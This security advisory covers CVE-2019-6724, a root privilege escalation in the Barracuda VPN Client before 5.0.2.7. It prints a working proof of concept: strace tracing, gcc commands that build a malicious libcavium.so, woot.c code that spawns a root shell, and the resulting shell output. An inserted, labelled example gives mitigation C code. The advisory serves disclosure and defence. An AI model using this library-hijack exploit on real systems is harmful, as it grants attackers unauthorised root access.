Allele Security Alert
ASA-2019-00157
Identifier(s)
ASA-2019-00157, CVE-2019-6724
Title
Privilege Escalation in VPN Client
Vendor(s)
Barracuda
Product(s)
Barracuda VPN Client for macOS
Barracuda VPN Client for Linux
Affected version(s)
Barracuda VPN Client prior to version 5.0.2.7 for Linux
Barracuda VPN Client prior to version 5.0.2.7 for macOS
Fixed version(s)
Barracuda VPN Client version 5.0.2.7 for Linux
Barracuda VPN Client version 5.0.2.7 for macOS
Proof of concept
Yes
Description
The barracudavpn component of the Barracuda VPN Client prior to version 5.0.2.7 for Linux, macOS, and OpenBSD runs as a privileged process and can allow an unprivileged local attacker to load a malicious library, resulting in arbitrary code executing as root.
Technical details
The barracudavpn binary attempts to load a non-existent library named libcavium.so from /opt/phion/libs64/engines.
[root@localhost ~]# strace -u user1 -o /tmp/vpn.trace -ff -s 1000 /usr/local/bin/barracudavpn
[root@localhost ~]# grep \\.so /tmp/vpn.trace
open("/opt/phion/libs/engines/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
The directory from which it tries to load the library can be influenced through the OPENSSL_ENGINES environment variable.
[root@localhost ~]# export OPENSSL_ENGINES=/foobar
[root@localhost ~]# timeout 10s strace -u user1 -ff /usr/local/bin/barracudavpn 2>&1|grep '\.so'
open("/foobar/libcavium.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
Then, achieving privilege escalation is straightforward.
[user1@localhost ~]$ mkdir foobar
[user1@localhost ~]$ gcc -fPIC -Wall -o woot.o -c woot.c
[user1@localhost ~]$ gcc -Wall -shared -Wl,-soname,libcavium.so -Wl,-init,woot -o foobar/libcavium.so woot.o
[user1@localhost ~]$ export OPENSSL_ENGINES=foobar
The content of woot.c:
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void woot(){
    setreuid(0,0);
    execl("/bin/sh","/bin/sh",NULL);
}
After building the malicious library and setting the environment variable, simply running /usr/local/bin/barracudavpn results in privilege escalation.
[user1@localhost ~]$ id
uid=1000(user1) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[user1@localhost ~]$ /usr/local/bin/barracudavpn
sh-4.2# id
uid=0(root) gid=1000(user1) groups=1000(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2#
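A mitigation sketch for the flaw described above, added here as an example; it is not part of the original alert and is not Barracuda's code. It shows a privileged program ignoring OPENSSL_ENGINES and accepting only a root-owned directory that group and others cannot write to. The function names are hypothetical, and the built-in path is an assumption taken from the strace output.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Nonzero when running set-user-ID or set-group-ID, i.e. with more
 * privilege than the invoking user. */
int is_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Accept a directory for privileged library loading only if it is an
 * absolute path to a directory owned by root and not writable by group or
 * others. Parent directories are not checked here. */
int dir_is_trusted(const char *path)
{
    struct stat st;
    if (path == NULL || path[0] != '/')
        return 0;
    if (stat(path, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    return st.st_uid == 0 && (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Pick the engine directory. A privileged process drops OPENSSL_ENGINES and
 * uses only the built-in directory, and only if that directory is trusted;
 * NULL means "load no engine". An unprivileged process may honor the
 * variable, because the code then runs with the caller's own rights. */
const char *engine_dir(int privileged, const char *builtin)
{
    const char *env;

    if (privileged) {
        unsetenv("OPENSSL_ENGINES");
        return dir_is_trusted(builtin) ? builtin : NULL;
    }
    env = getenv("OPENSSL_ENGINES");
    return env != NULL ? env : builtin;
}

int main(void)
{
    /* Assumed built-in path, copied from the strace output in this alert. */
    const char *dir = engine_dir(is_privileged(), "/opt/phion/libs/engines");
    printf("engine directory: %s\n", dir ? dir : "(none)");
    return 0;
}
```

With this check in place, the relative directory "foobar" from the proof of concept is never consulted by the privileged process, and a user-owned or world-writable directory is rejected even if it is configured as the built-in path.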
Credits
Rich Mirch
Reference(s)
CVE-2019-6724 : Barracuda VPN Client Privilege Escalation on Linux and macOS
https://blog.mirch.io/2019/02/14/cve-2019-6724-barracuda-vpn-client-privilege-escalation-on-linux-and-macos/
Release Notes – Barracuda VPN Client for macOS
https://campus.barracuda.com/product/networkaccessclient/doc/78154147/release-notes-barracuda-vpn-client-for-macos/
Release Notes – Barracuda VPN Client for Linux
https://campus.barracuda.com/product/networkaccessclient/doc/78154149/release-notes-barracuda-vpn-client-for-linux/
CVE-2019-6724.sh
https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2019-6724.sh
CVE-2019-6724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6724
CVE-2019-6724
https://nvd.nist.gov/vuln/detail/CVE-2019-6724
Last modified: March 27, 2019